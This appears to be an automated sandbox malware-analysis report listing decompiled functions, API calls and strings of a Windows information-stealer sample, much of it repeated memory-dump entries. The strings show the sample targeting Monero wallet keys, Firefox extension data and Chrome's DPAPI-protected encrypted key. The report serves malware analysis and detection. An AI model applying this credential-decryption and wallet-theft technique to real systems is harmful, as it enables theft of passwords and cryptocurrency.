GetEnvironmentVariableA.KERNEL32(00EB89A0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 003CA0BD
LoadLibraryA.KERNEL32(00EBD118), ref: 003CA146

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

SetEnvironmentVariableA.KERNEL32(00EB89A0,00000000,00000000,?,003E12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,003E0AFE), ref: 003CA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 003CA0B2, 003CA0C6, 003CA0DC

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1843082770
Opcode ID: aca0384a6577a3c6c0fbc5589f1cc721de0e0baf03bbfeff8fe0fcb8223c57a0
Instruction ID: e844475c694fc982d143083deac8e1941b1ff83d261aed551f1f827d0359b995
Opcode Fuzzy Hash: aca0384a6577a3c6c0fbc5589f1cc721de0e0baf03bbfeff8fe0fcb8223c57a0
Instruction Fuzzy Hash: 07417AB1861714AFCB0ADFE4ED85FAB37BABB08341F085129E401972A0DB365944CF63

Function 003CA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00EB9CC8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 003CA3FF
lstrlen.KERNEL32(00000000), ref: 003CA6BC

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

DeleteFileA.KERNEL32(00000000), ref: 003CA743

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2138a9f94ea7443045c971c1bc1d440dec9f0e730813dacae51ef0ab08feeb5c
Instruction ID: d5b902f4b3e0599e5c357768460e075d3ee3698718f86b5066e5866c7f1e061d
Opcode Fuzzy Hash: 2138a9f94ea7443045c971c1bc1d440dec9f0e730813dacae51ef0ab08feeb5c
Instruction Fuzzy Hash: 51E132738105589ACB06FBA4EE92EEE7738BF14300F50815AF5177A191EF306A09DB66

Function 003CD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00EB9CC8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CD801
lstrlen.KERNEL32(00000000), ref: 003CD99F
lstrlen.KERNEL32(00000000), ref: 003CD9B3
DeleteFileA.KERNEL32(00000000), ref: 003CDA32

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 070804ca17928302c0bb80c8935dba547717523f5597e5a6fbfae20c9b8060a1
Instruction ID: 336815aae0fa268f46195f69a17cb6792a50daf2ac955d8334ea0a43a4900149
Opcode Fuzzy Hash: 070804ca17928302c0bb80c8935dba547717523f5597e5a6fbfae20c9b8060a1
Instruction Fuzzy Hash: 158128738105189BCB06FBA0ED52EEE7739BF14300F40412AF407AA191EF746A09DB66

Function 003CF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003E1580,003E0D92), ref: 003CF54C
lstrlen.KERNEL32(00000000), ref: 003CF56B

Strings

moz-extension+++, xrefs: 003CF5AD
^userContextId=4294967295, xrefs: 003CF59C

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 17e3d7b9e4c67bbadb457e58842f043cbc015bc73d1f20a4650a6568d21b9c49
Instruction ID: 8f2d0584e6a074727e368a28a784c4de6d03231c1e86e28d69576bc352fe7e9a
Opcode Fuzzy Hash: 17e3d7b9e4c67bbadb457e58842f043cbc015bc73d1f20a4650a6568d21b9c49
Instruction Fuzzy Hash: 7D514773D006489ADB05FBF0ED92DED7778AF54300F408529F8169B291EF346A19DBA2

Function 003D70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003D718C
s=, xrefs: 003D7111
s=, xrefs: 003D72AE, 003D7179, 003D717C

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: s=$s=$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-2558142500
Opcode ID: 0189c84e6034e9a54ac0b5ec7924560e2be24ec09364782052ed0c74042df680
Instruction ID: b2c881fb1ebd1eb8ec9ade0ed3f1b113dac66081827219de72066438200ed5ee
Opcode Fuzzy Hash: 0189c84e6034e9a54ac0b5ec7924560e2be24ec09364782052ed0c74042df680
Instruction Fuzzy Hash: 395192B2C042189FDB15EBA0ED81BEEB774AF44304F1041AAE51577281EB746F88CF54

Function 003C9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003C9D39

Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9AEF
Part of subcall function 003C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003C4EEE,00000000,?), ref: 003C9B01
Part of subcall function 003C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N<,00000000,00000000), ref: 003C9B2A
Part of subcall function 003C9AC0: LocalFree.KERNEL32(?,?,?,?,003C4EEE,00000000,?), ref: 003C9B3F

Part of subcall function 003C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C9B84
Part of subcall function 003C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003C9BA3
Part of subcall function 003C9B60: LocalFree.KERNEL32(?), ref: 003C9BD3

Strings

"encrypted_key":", xrefs: 003C9D30
, xrefs: 003C9DC1
DPAPI, xrefs: 003C9D89

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 87c624329b52dba39e290d385d6e22e333cc264db65d6171b1ebc7603e33b6c5
Instruction ID: e957af94281716b7de168631034fcdcaee6f4df73fcb090e05735c72736e4bf8
Opcode Fuzzy Hash: 87c624329b52dba39e290d385d6e22e333cc264db65d6171b1ebc7603e33b6c5
Instruction Fuzzy Hash: E1311EB6D10209ABCF05DBE4DD89FEEB7B8AB48304F15451EE906B7241E7319E04CBA1

